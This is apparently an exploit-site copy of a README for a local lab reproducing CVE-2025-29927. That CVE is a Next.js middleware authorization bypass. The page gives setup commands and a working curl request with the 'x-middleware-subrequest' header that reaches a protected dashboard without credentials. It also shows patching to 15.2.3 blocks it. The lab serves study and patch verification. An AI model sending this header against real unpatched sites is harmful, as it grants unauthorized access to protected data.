Exploit for Incorrect Authorization in Vercel Next.Js CVE-2025-29927

## https://sploitus.com/exploit?id=C1CCFFF3-2CB0-5007-ACAB-0173D4F36B96
# CVE-2025-29927 Lab

Minimal reproduction lab for CVE-2025-29927 — Next.js middleware authorization bypass (CVSS 9.1).

Companion to: [N-Day Analysis writeup on Medium](https://medium.com/@swapjam)

## What this is

A Next.js 15.2.2 app (vulnerable) with a cookie-gated `/dashboard` route. The middleware auth check can be bypassed by sending a single HTTP header — no credentials required.

## Requirements

- Node.js 18+

## Setup

```bash
git clone https://github.com/SwapnilDeshpande/cve-2025-29927-lab
cd cve-2025-29927-lab
npm install   # pins to Next.js 15.2.2 (vulnerable)
npm run dev -- --port 3001
```

## Reproduce the bypass

**Step 1 — Confirm middleware blocks unauthenticated requests:**

```bash
curl -s -o /dev/null -w "%{http_code}" http://localhost:3001/dashboard
# → 307
```

**Step 2 — Bypass middleware with the subrequest header:**

```bash
curl -s -o /dev/null -w "%{http_code}" \
  -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
  http://localhost:3001/dashboard
# → 200
```

**Step 3 — Upgrade to the patched version and confirm the bypass is blocked:**

```bash
npm install next@15.2.3
# Restart the dev server, then repeat Step 2
# → 307
```

## App routes

| Route | Access |
|---|---|
| `/` | Public |
| `/login` | Public |
| `/dashboard` | Protected by middleware (requires `session` cookie) |

## Affected versions

Next.js < 15.2.3, < 14.2.25, < 13.5.9, < 12.3.5

## References

- [NVD — CVE-2025-29927](https://nvd.nist.gov/vuln/detail/CVE-2025-29927)
- [Next.js patch PR #77201](https://github.com/vercel/next.js/pull/77201)
- [Vulnerable source — sandbox.ts](https://github.com/vercel/next.js/blob/v15.2.0/packages/next/src/server/web/sandbox/sandbox.ts)